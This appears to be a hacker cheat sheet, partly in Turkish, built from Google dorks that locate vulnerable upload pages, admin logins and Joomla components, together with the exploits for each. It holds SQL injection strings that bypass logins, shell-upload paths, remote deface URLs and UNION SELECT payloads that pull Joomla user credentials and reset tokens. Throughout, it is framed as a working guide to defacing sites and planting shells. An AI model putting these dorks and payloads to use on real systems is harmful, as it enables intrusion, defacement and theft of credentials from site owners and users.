inurl:”/admin/saveannounce_upload.asp” inurl:”admin/eWebEditor/Upload.asp” inurl:”UploadFile/upload.asp” WEBWİZ ACİGİ (RTE UPLOAD ACIGI ) inurl:rte/my_documents/my_files/ inurl:/my_documents/my_files/ exloit: /rte/RTE_popup_file_atch.asp Editör açığı inurl:editor/assetmanager/ (arama kodu geliştirilebilir) EXPLOİT : /Editor/assetmanager/assetmanager.asp Joomla upload açıgı inurl index.php?option=com_expose Exploit: administrator/components/com_expose/uploadimg.php Uploadin gittigi yer : /components/com_expose/expose/img/ Sitefinity: Login upload açıgı inurl:”Sitefinity: Login” exploit: Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx Auto Login For Joomla Dork .:old:. inurl:/administrator/index.php?autologin=1 --- BYPASS ADMIN ACCESS Dorks: Code: inurl:admin.asp inurl:adminlogin.aspx inurl:admin/index.php inurl:administrator.php inurl:administrator.asp inurl:login.asp inurl:login.aspx inurl:login.php inurl:admin/index.php inurl:adminlogin.aspx Code: ‘ or 1=1 – 1'or’1'=’1 admin’– ” or 0=0 – or 0=0 – ‘ or 0=0 # ” or 0=0 # or 0=0 # ‘ or ‘x’='x ” or “x”=”x ‘) or (‘x’='x ‘ or 1=1– ” or 1=1– or 1=1– ‘ or a=a– ” or “a”=”a ‘) or (‘a’='a “) or (“a”=”a hi” or “a”=”a hi” or 1=1 – hi’ or 1=1 – hi’ or ‘a’='a hi’) or (‘a’='a ---- Joomla Component com_smartformer shell upload Google Dork inurl:"index.php?option=com_smartformer" & upload shell.php Your shell : http://localhost/components/com_smartformer/files/yourshell.php --- Ministry Web Designing Multiple Vulnerabilities exploit bypass to login: user: '=' 'or' pass: '=' 'or' Vunlerable Sections: inurl:/downloadcounter/admin/login.php inurl:/mediaprogram/admin/index.php inurl:/churchprogram/login.php ---- (Deface)Exploit (Remote Deface ) Joomla Component Dork : inurl:index.php?option=com_fabrik Exploit : /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1 --- [Priv8] Joomla Com_content exploit - defacing joomla websites Dork : inurl:index.php?option=com_content & "/mambots/editors/fckeditor" Vulnerable File : mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php You can exploit this vulnerable joomla component and deface joomla wesbites and you can also sometimes upload your shell ---- exploit joomla "com_artforms" reset password Dork : inurl:"option com_artforms" /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users-- /index.php?option=com_user&view=reset /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users